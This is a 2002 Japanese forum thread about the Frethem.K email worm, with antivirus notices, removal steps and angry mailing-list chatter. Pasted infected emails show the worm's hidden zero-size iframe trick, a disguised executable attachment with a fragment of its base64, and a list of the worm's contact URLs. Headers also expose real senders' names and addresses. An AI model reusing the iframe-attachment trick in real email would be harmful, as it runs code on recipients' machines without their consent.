〜15日19時現在、未対応のアンチウィルスソフトもあり
http://www.watch.impress.co.jp/internet/www/article/2002/0715/frethem.htm
【PC】件名が「Re: Your Password!」メールに注意、新種ウイルスが流行の兆し
http://news2.2ch.net/test/read.cgi/newsplus/1026721442/l50
http://pc.2ch.net/test/read.cgi/sec/1024061532/767-
かわいそうな作者タン…
ttp://www.vector.co.jp/soft/win31/util/se018881.html
今日になって判明。
気難しい大ボスのマシンがデフォだった。しかもOutlookじゃなくてOE利用。
Nortonの定義ファイルも大昔。
誰だよ、対処しないで放置したの(笑
ギコの口が変になるから未だにバージョンアップしてないのだが・・・
スレ違いの話だけど。
IE6突っ込むなら、クリーンインストール後にやった方がいいよ。
何故かしらんけど、IE5.5にパッチとか散々入れた後だと、IE6インスコ直後から落ちまくりだった。
ひょっとすると、受信したメールのアドレスに対して全て送信していたかもしれません。
人がいたのでそうかも。偽ったかもしらん。
Becky!だ
なっていました。Nortonのウイルス定義ファイルも最新だったようです。
その社員の方からばら撒かれたメールは、OutlookとOutlook expで添付ファイ
ルがあったり、無かったりの症状でした。
Outlook expを利用している方は、添付ファイルが見えてしまうようなので、と
もかくexeファイルを実行しないようにしてくださいネ。
保存しとく?って警告が出るはずなのにな。
そこで思いつかないってのは、困ったさんっすね。
アドバイスサンクス
バージョンアップしよ。メーラがHTMLメール比対応のAL-MAILだからあんま気にしてなかったけど。
スレ違いにつきsage
>>14
トレンドマイクロによるとフレゼムKだそうな。
情報でとるよ
Return-Path: <*********.ota@japan-telecom.co.jp>
Received: from sh.janog.gr.jp ([210.150.17.51]) by ****************
with ESMTP id <*****************************@sh.janog.gr.jp>;
Mon, 15 Jul 2002 15:**:** +0900
Received: by sh.janog.gr.jp (Postfix)
id 295BF3A618B; Mon, 15 Jul 2002 15:53:19 +0900 (JST)
Delivered-To: janog-outgoing@janog.gr.jp
Received: from Yellow.japan-telecom.co.jp (Yellow.japan-telecom.co.jp [210.146.35.35])
by sh.janog.gr.jp (Postfix) with ESMTP id CAB313A5F6F
for <janog-outgoing@janog.gr.jp>; Mon, 15 Jul 2002 15:53:18 +0900 (JST)
Received: from JTEnglish.japan-telecom.co.jp (localhost [127.0.0.1])
by Yellow.japan-telecom.co.jp (3.7W-Yellow) with ESMTP id g6F6r9409577
for <janog-outgoing@janog.gr.jp>; Mon, 15 Jul 2002 15:53:09 +0900 (JST)
Received: from AFRICA ([172.16.237.23])
by rs41ag02.japan-telecom.co.jp (Lotus Domino Release 5.0.8)
with SMTP id 2002071515523870:991 ;
Mon, 15 Jul 2002 15:52:38 +0900
From: *********.ota@japan-telecom.co.jp
To: janog-outgoing@janog.gr.jp
Subject: Re: Your password!
MIME-Version: 1.0
Date: Mon, 15 Jul 2002 15:52:39 +0900
Message-ID: <OF5C37EE24.9F67D683-ON49256BF7.0025C773@japan-telecom.co.jp>
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG
--L1db82sd319dm2ns0f4383dhG
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html;
<HTML><HEAD></HEAD><BODY>
<FONT COLOR=#FF0000>
<b>ATTENTION!</b><br><br>
You can access<br>
<b>very important</b><br>
information by<br>
this password<br><br>
<b>DO NOT SAVE</b><br>
password to disk<br>
use your mind<br><br>
now press<br>
<b>cancel</b><br><br>
(Toshinori Ota)</font></BODY></HTML>
<iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>
--L1db82sd319dm2ns0f4383dhG
Content-Type: audio/x-midi;
name=decrypt-password.exe
Content-ID: <W8dqwq8q918213>
Content-Transfer-Encoding: base64
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAAvUy/dazJBjmsyQY5rMkGOMhFSjmkyQY4QLk2OYzJBjuguT45/MkGOgy1L
jg4yQY6DLUqOYzJBjmsyQY5jMkGOCS1SjmAyQY5rMkCOATJBjoMtV45lMkGOUmljaGsyQY4AAAAA
おぉ?
さっさと対応せんかい 役立たずめが
名前消しもれてますよ。(プ
> <b>cancel</b><br><br>
> (Toshinori Ota)</font></BODY></HTML>
> <iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>
実名晒してるぞ
To でも From でもないみたい。
Received: from AFRICA ([172.16.237.23])
の AFRICA って何でしょうか?
私のところには
Received: from AFRICA ([10.40.130.151])
から来ています。
トレンドだかシマンテックでそのIPアドレス見たような記憶。
今、何故かどっちとも繋がらないんだけど。
アドレスは知らんけど、多分そのPCのIPでしょ。
おいおい、おまいはプライベートアドレスをしらんのか。
ここ出入り禁止。
From のところ書き換えたりするよ。
まだ対応していないよ。
02/07/15予定 (米国時間)
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.frethem.k%40mm.html
http://securityresponse.symantec.com/avcenter/venc/data/w32.frethem.k@mm.html
には予定、とか書いてないように見えるけど気のせいでしょうか
社内から山ほどウイルスが来たと思ったら全部社外のIPからだった。
漏れの勘違いでした。
Symantecにて、ver.Jとver.Kがそれぞれ別に掲載されました。
ver.k
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.k%40mm.html
ver.j
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.j%40mm.html
TrendMicroでは、まだ1つしか掲載されてないっす。
まとめて見るURLって、どうやるんでしたっけ?
(概要) http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.K
(詳細) http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.K&VSect=T
というか。漏れのところに届く、ファイルサイズがもっと小さいのがあるんすけど。
もう大騒ぎ(藁。
きゃは!恥かしい限りっす。
一瞬これと勘違いしました。
>ワームはシステム常駐後、以下のサイトにアクセスを試み続けます。これはWeb広告サイトの紹介システムのポイントを稼ぐためと思われます:
定義ファイルのリンク先に行ってみた?
まだ 12日付の定義で15日付の定義はでていないよ。
60通位来てて、鯖も落ちました
本名で登録していたなら、笑いっす。
アドレスで会社の人からとわかったんですが、家のPCのアドレスを
教えているのは会社では別の一人だけなんです。
その人に連絡したら自分は感染してないと言いました。
これって、ネットワーク感染ってことですか?
的外れな質問だったら許して下さいね。
ポイント稼ぎ狙いの確信犯だな。
http://12.220.54.29/b.cgi
http://12.224.160.208/b.cgi
http://12.225.239.153/b.cgi
http://12.239.90.200/b.cgi
http://12.249.100.107/b.cgi
http://12.252.211.170/b.cgi
http://128.173.231.167/b.cgi
http://129.120.117.218/b.cgi
http://140.158.208.167/b.cgi
http://143.111.86.30/b.cgi
http://144.132.27.124/b.cgi
http://147.26.215.144/b.cgi
http://150.208.186.200/b.cgi
http://170.11.31.35/b.cgi
http://172.148.216.191/b.cgi
http://172.149.84.171/b.cgi
http://195.13.227.140/b.cgi
http://195.13.227.143/b.cgi
http://195.251.228.133/b.cgi
http://204.57.90.184/b.cgi
http://205.162.24.103/b.cgi
http://207.108.36.78/b.cgi
http://207.171.103.126/b.cgi
http://207.50.54.128/b.cgi
http://208.190.152.25/b.cgi
http://208.28.196.214/b.cgi
http://208.38.78.170/b.cgi
http://209.192.135.22/b.cgi
http://209.34.29.161/b.cgi
http://213.190.55.222/b.cgi
http://217.199.112.38/b.cgi
http://24.138.42.33/b.cgi
http://24.153.41.186/b.cgi
http://24.157.108.78/b.cgi
http://24.159.28.120/b.cgi
http://24.198.18.192/b.cgi
http://24.24.128.16/b.cgi
http://24.242.106.163/b.cgi
http://24.243.76.55/b.cgi
http://24.25.79.187/b.cgi
http://24.91.146.67/b.cgi
http://24.91.187.71/b.cgi
http://4.47.227.27/b.cgi
http://63.106.67.21/b.cgi
http://63.231.167.66/b.cgi
http://63.71.246.234/b.cgi
http://64.211.174.43/b.cgi
http://64.249.48.181/b.cgi
http://65.25.12.45/b.cgi
http://65.67.205.182/b.cgi
http://66.108.150.226/b.cgi
http://66.189.114.161/b.cgi
http://66.233.33.212/b.cgi
http://66.30.52.166/b.cgi
http://66.31.193.42/b.cgi
http://66.31.93.30/b.cgi
http://66.41.32.83/b.cgi
http://66.68.22.102/b.cgi
http://68.113.156.82/b.cgi
http://68.35.125.130/b.cgi
http://68.42.253.163/b.cgi
http://68.57.88.25/b.cgi
http://68.69.53.36/b.cgi
> この亜種は、
> <a href="mailto:w32.frethem.k@mm.html">W32.Frethem.K@mm</a>として、
> 情報を提供しております。
クリックしたらちょっとビビったよ。
漁らないのかな。
そのうちMLからが2通。ナンダカナ(´Å`)
未だに対策無しとは・・・ダメだこりゃ。
・トレンドマイクロ
→ 15日19時頃?
・ネットワークアソシエイツ
→ 15日19時頃?
・シマンテック
→ 15日23時頃?
各社が15時頃からパターンファイル作成開始したと
すると、シマンテックだけ倍近くかかってるってこと?
シマンテックだめじゃん・・・
投稿日付 2002年07月15日(月) 20時55分29秒
投稿者 COOL管理者 メール webmaster@cool.ne.jp
時期・期間 指定無し
該当都市 なし
内容 ご利用いただきありがとう御座います。
recruit@cool.ne.jpよりワーム型ウイルス(Win32.Frethem.k)のメールが送信されている可能性が御座います。
Re: Your password!
上記の件名で送信されているメールに添付されているファイルは実行せず、必ず破棄されるようお願いいたします。
また、感染の疑いがある場合は早急に調査をされるようお願いいたします。
*ウイルスの詳細に関しては以下のURL等をご参照ください。
http://www.trendmicro.co.jp/virusinfo/news2002/worm_frethem_k.asp
現在、詳細を調査中ですが、詳しい事が分かり次第追ってご報告させていただきます。
メールのヘッダって公開していいの?
X-UIDL: ***********************************
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Apparently-To: ******@******.jp *****************.jp; 15 Jul 2002 19:25:28 +0900 (JST)
Return-Path: <***********@******.oracle.co.jp>
X-Track: 1: 40
Received: from ******.oracle.co.jp (202.***.136.**)
by ****************.jp with SMTP; 15 Jul 2002 19:25:25 +0900 (JST)
Received: from localhost (daemon@localhost)
by *******.oracle.co.jp (**************) with SMTP id *******;
Mon, 15 Jul 2002 19:13:07 +0900 (JST)
Received: by oracle.co.jp (bulk_mailer v1.13); Mon, 15 Jul 2002 19:12:40 +0900
Received: (from majordom@localhost)
by naoko.oracle.co.jp (***********) id *******
for terakoya_tech-going; Mon, 15 Jul 2002 19:12:40 +0900 (JST)
X-Authentication-Warning: *******.oracle.co.jp: majordom set sender to owner-terakoya_tech using -f
Received: from mx.ctc-g.co.jp (ns.ctc-g.co.jp [131.248.**.*])
by *****.oracle.co.jp (*************) with ESMTP id ********
for <**********@*****.oracle.co.jp>; Mon, 15 Jul 2002 19:12:38 +0900 (JST)
From: tsuyoshi.ikeda@*******.**.jp
Received: by mx.ctc-g.co.jp (CTC-GN mail 11/07/98) id *******; Mon, 15 Jul 2002 19:25:08 +0900 (JST)
Received: by mx1.ctc-g.co.jp (CTC-GN mail 04/16/98) id ********; Mon, 15 Jul 2002 16:37:47 +0900
Received: by ctcfe.ctc-g.co.jp (CTC-GN mail 11/12/01) id ********; Mon, 15 Jul 2002 16:38:25 +0900
Date: Mon, 15 Jul 2002 16:38:25 +0900
Message-Id: <200207150738.QAA14242@ctcfe.ctc-g.co.jp>
To: ************@*****.oracle.co.jp
Subject: [terakoya'tech'info:75] Re: Your password!
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG
Sender: **********@*****.oracle.co.jp
--L1db82sd319dm2ns0f4383dhG
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY>
<FONT COLOR=#FF0000>
<b>ATTENTION!</b><br><br>
You can access<br>
<b>very important</b><br>
information by<br>
this password<br><br>
<b>DO NOT SAVE</b><br>
password to disk<br>
use your mind<br><br>
now press<br>
<b>cancel</b><br><br>
(** *)</font></BODY></HTML>
<iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>
Date: Mon, 15 Jul 2002 21:09:10 +0900
From: <Administrator@turbolinux.co.jp>
To: <tl-users@meigetsu.turbolinux.co.jp>
InterScan for Microsoft Exchangeにより添付ファイルがブロックされました。
送信者 = konishi@mail.doshisha.ac.jp
受信者 = tl-users@meigetsu.turbolinux.co.jp
件名 = Re: Your password!
検索実行時刻 = 07/15/2002 21:09:10
ファイルブロック時の処理:
添付ファイル decrypt-password.exe は添付ファイルブロック設定に適合しました。InterScanにより削除が実行されました。
Date: Mon, 15 Jul 2002 20:50:32 +0900
From: System Attendant <POO02-SA@pc-daiwabo.co.jp>
To: "'turbolist-ml@turbolinux.co.jp'" <turbolist-ml@turbolinux.co.jp>
InterScan for Microsoft Exchangeにより、メールに処理が実行されました。詳細は
次の通りです。
送信者 = tachiki@dd.iij4u.or.jp
受信者 = turbolist-ml@turbolinux.co.jp
件名 = Re: Your password!
検索実行時刻 = 07/15/2002 20:50:32
検索エンジン/パターン = 6.150-1001/317
ウイルス発見時の処理:
添付ファイル decrypt-password.exe は添付ファイルブロック設定に適合しました。
InterScanにより移動が実行されました。 添付ファイルは
D:\Trend\Isme\Alert\decrypt-password3d32b70816c.exe_ に移動されました。
受信者への警告! InterScanによりウイルスが検出されました。
From: "奥原 浩" <2000z28@kumagaya-h.ed.jp>
Reply-To: <2000z28@kumagaya-h.ed.jp>
To: <turbolist-ml@turbolinux.co.jp>
http://www.ipa.go.jp/security/topics/newvirus/frethem.html
をご覧ください。そちらから、ウィルス付メールが送られてきました。
--
*******************************************************
熊谷高校 COM事務局 奥原 浩
Kumagaya Boys' Highschool Webmaster Okuhara Hiroshi
Mail: 2000z28@kumagaya-h.ed.jp
HP:http://www.kumagaya-h.ed.jp
*******************************************************
--
アホかっちゅうの、MLに投げるなっちゅうの。
.netかぁ。。。
MS逝ってよし!
トレンドマイクロのホームページ見たら
「プレビューしただけで感染」と書いてありました。
もちろん何も知らないのでプレビューしたのですが、
そのときにメーラーが「ウィルスと思われるファイルがありますが…」と表示したのですが、
この場合も感染したことになるのでしょうか?
一応ウィルス検索のために
新規フォルダを作ってそこに保存したのですが。
危ないでしょうか?
>>56のcoolからです
対処方法
Windowsフォルダーにコピーされた taskbar.exe を削除する。
参考手順:
1.インターネット接続を遮断する。
(クライアント PC に接続されているイーサネットケーブルや無線 LAN カードを物理的に抜くのが確実で す。)
これによって、ウイルス が動作した場合にも、メール送信による感染拡大を防ぎます。
2.添付ファイルをもった該当メールのメッセージを削除する。
3.Control キー、Alt キー、Delete キーを同時に押下し、プログラム一覧から taskbar を選択し、強制終了する。
4.「スタート」「検索」から、taskbar.exe を探し、削除する。
5.再起動する。
http://www.ipa.go.jp/security/topics/newvirus/frethem.html
taskbar.exeが見当たらないってことは
感染してないってことでしょうか?
そうです。文章をよく読みましょう。ハアト。
Date: Mon, 15 Jul 2002 22:02:23 +0900
From: "Yukihiro Yonehara" <acalanata@mm.neweb.ne.jp>
To: <turbolist-ml@turbolinux.co.jp>
http://www.ipa.go.jp/security/topics/newvirus/frethem.html
をご覧ください。そちらから、ウィルス付メールが送られてきました。
至急、対応願います。
米原 幸宏
やかましいんじゃボゲッ!!
なにが至急、対応願いますだアホ
Received: from rcpt-impgw.biglobe.ne.jp by biglobe.ne.jp (RCPT_GW)
id TAA10966; Mon, 15 Jul 2002 19:15:18 +0900 (JST)
Received: from tg4.sharp.co.jp (tg4.sharp.co.jp [211.4.241.22])
by rcpt-impgw.biglobe.ne.jp (mnmy/3916220502) with ESMTP id g6FAFGc10946
for <xxx@xxx.biglobe.ne.jp>; Mon, 15 Jul 2002 19:15:17 +0900 (JST)
Received: from tg.sharp.co.jp (unknown [10.65.37.38])
by tg4.sharp.co.jp (Postfix) with ESMTP id 8CB193C243
for <xxx@xxx.biglobe.ne.jp>; Mon, 15 Jul 2002 19:15:16 +0900 (JST)
Received: from ws2-tnr.sharp.co.jp (unknown [10.65.37.40])
by tg.sharp.co.jp (Postfix) with SMTP id 2B92511568A
for <xxx@xxx.biglobe.ne.jp>; Mon, 15 Jul 2002 19:15:15 +0900 (JST)
Received: FROM mail.sharp.co.jp BY ws2-tnr.sharp.co.jp ; Mon Jul 15 19:14:45 2002 +0900
Received: from AFRICA by mail.sharp.co.jp (8.10.2/1.1.2.11/09Feb01-0154PM)
id g6FAEjw0002344278; Mon, 15 Jul 2002 19:14:45 +0900 (JST)
Date: Mon, 15 Jul 2002 19:14:45 +0900 (JST)
Message-Id: <200207151014.g6FAEjw0002344278@mail.sharp.co.jp>
From: audio_support@sharp.co.jp
To: xxx@xxx.biglobe.ne.jp
Subject: Re: Your password!
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG
X-UIDL: 799792848084825F976256025F999313405F255
taskbar display "RunDLL deskcp16.dll,QUICKRES_RUNDLLENTRY"
てあるんですけど これですか? これを削除すれば いいんですか?
初めてのことなんで。。。
それは違う、解像度変更のタスクバーアイコンのやつだろ
そうだったんですか・・ありがとうございます。
パッチ当ててないIEとOE使ってるヘタレなもんで。。
ウィルスメール受け取ったの今回が初めてなもんで(汗
まあ 明らかに怪しいメールだったんで プレビューで表示されたけど 添付ファイルだけは開けないでそのまま削除しといたんです。
というかなんでパッチ当てないのかききたい。
へたれとか言ってる暇があったら当てれ。
こいつうちにもきたぞ何者だ?
MLのROMで
MLへのポスト/リプライの仕方知らない人
Date: Tue, 16 Jul 2002 00:42:37 +0900
From: 石川初男 <ishikawa@tmc-ipd.ac.jp>
To: turbolist-ml@turbolinux.co.jp
管理者殿
ウィルスの発信元が貴殿のメーリングリストからのものになっています。
早急に停止を。
Subject: test
Date: Tue, 16 Jul 2002 00:52:00 +0900
From: 宮本 明 <a_miyamoto@njc.co.jp>
To: <turbolist-ml@turbolinux.co.jp>
Subject: test
Date: Tue, 16 Jul 2002 00:52:37 +0900
From: 宮本 明 <a_miyamoto@njc.co.jp>
To: <turbolist-ml@meigetsu.turbolinux.co.jp>
アホかっちゅうの
http://www.turbolinux.co.jp/dcforum/DCForumID11/4068.html
手動削除手順:
1)不正プログラムの自動起動設定を削除します。
Windowsのレジストリエディタ(regedit.exe)などを使用して以下のレジストリの値を削除してください。
場所: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
値 : "Task Bar"="<Windowsディレクトリ>\taskbar.exe"
トレンドマイクロからコピペ
そしてwindowsディレクトリのtaskbar.exeを削除するのだ
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.k%40mm.html
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.j%40mm.html
http://www.trendmicro.co.jp/virusinfo/news2002/worm_frethem_k.asp
http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Frethem.l@MM
http://www.nai.com/japan/virusinfo/infoFrethem.asp
投げるのはやめれ>某組織
投げんならちゃんとenvelope fromに返せっつーの
ここは <> なメールも受け取らんし何考えてんだ
これは安全なのか?
何も考えてない。
なんで?
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=4305
駆除後はアンチウィルスソフト常駐させよ。
KLEZ で詐称された From のアドレス宛に、ウィルス警告メールを送ってくる
対策ソフトもうざい。
昨日夕刻にきたわよ。
その場でノートンの更新をしたけど駄目だったのよ。
アドレス帳が”送ってはいけない人たち”リストになってたのよ。
今日は朝から脅しメールや電話が来まくるのよやーねぇ。
InterScanだとenvelope-fromに送るみたいだけど。
ディズニーオンアイス事務局あてのウイルス警告メールが
うちにがんがん流れてくるんだけど。なんで?
ちなみに本体は来てません。
TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▲
WEBPOPUPからメッセージをもらったひと (408)
ID制導入を希望するか否か議論するスレ (866)
【N豚N奴】一番いいセキュリティソフトはなんだ!!50 (466)
トリップのキージェネ (659)
こんなウィルスはいやだ!! 2匹目 (599)
日本のハッカーはへたれ (228)
--log9.info------------------
【怪盗ルソー】セーヌたんハァハァ総合スレッド (522)
世界樹の迷宮Uのフロ何とかさんはフルガード可愛い (462)
MOTHER3のフリントパパはハゲかっこいい (244)
【ポケモン】コトネアンチスレ【HGSS】 (207)
どうしてデブキャラってあんなに異常にきめぇの? (258)
【フォトカノ】果音【うさピース!】 (484)
ルーンファクトリーのアネット萌えスレ (242)
ユグドラ・ユニオンのロザリィ様は帽子カワイイ (616)
くりきんキャラ、キン総合スレ (353)
TOIのスパーダは二刀流ベルフォルマ (341)
【ユグドラ】女性キャラ萌え総合スレ【ユニオン】 (754)
【逆転裁判】牙琉響也萌えスレその3【ロックの狩人】 (506)
【スーパーダンガンロンパ2】澪田唯吹はけいおんカワイイ 2曲目 (860)
英雄伝説 零の軌跡のノエルは電磁ネットかわいい (951)
スーパーロボット大戦L萌えスレ (328)
【必殺】IM@S 日高愛 20点買い【日高コークスクリュー】 (371)
--log55.com------------------
「ICEと指輪物語のRPG」
【人間6人】ゾンビーズ!!【ゾンビ100体】
ヴァンパイアにつひて
シュミレーションゲームつくりました
【へぇ】 トリビアの泉in卓上板 【へぇ】
2ch汎用TRPGルールスレ
【2ndも】アースドーン-Earthdawn-【よろしく】
【毎月】ぎゃざ読者参加ゲーム7【希望】